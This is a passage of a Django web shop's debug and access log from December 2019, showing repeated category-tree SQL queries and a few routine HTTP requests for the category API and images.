BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:07:09,110 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:07:09,112 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:07:09,114 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:07:09,118 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:07:09,120 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:07:09,123 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:07:09,125 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:07:09,127 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:07:09,131 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:07:09,133 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:07:09,136 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:07:09,140 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:07:09,143 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 13:07:09,147 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:07:09,150 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:07:09,153 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:07:09,156 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:07:09,158 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:07:09,161 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:07:09,166 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:07:09,171 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:07:09,175 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 13:07:09,181 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:07:09,184 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 13:07:09] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [18/Dec/2019 13:07:09] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [18/Dec/2019 13:07:10] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [18/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [18/Dec/2019 13:18:42] "GET / HTTP/1.0" 302 0 [18/Dec/2019 13:18:58] "GET / HTTP/1.0" 302 0 [18/Dec/2019 13:24:01] "GET / HTTP/1.0" 302 0 [18/Dec/2019 13:29:04] "GET / HTTP/1.0" 302 0 [18/Dec/2019 13:34:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 13:39:04,691 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:39:04,699 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:39:04,704 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:39:04,707 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:39:04,710 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:39:04,713 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 13:39:04,716 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:39:04,719 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:39:04,721 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:39:04,726 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:39:04,728 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:39:04,731 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:39:04,734 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:39:04,736 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:39:04,741 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 13:39:04,743 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:39:04,746 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:39:04,748 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:39:04,751 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:39:04,755 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:39:04,757 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:39:04,760 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:39:04,762 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:39:04,764 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:39:04,767 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:39:04,770 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:39:04,772 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:39:04,775 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:39:04,777 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:39:04,780 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:39:04,783 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:39:04,786 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:39:04,788 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:39:04,791 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:39:04,793 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 13:39:04,800 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:39:04,804 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:39:04,811 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:39:04,817 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:39:04,822 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:39:04,827 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:39:04,834 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, 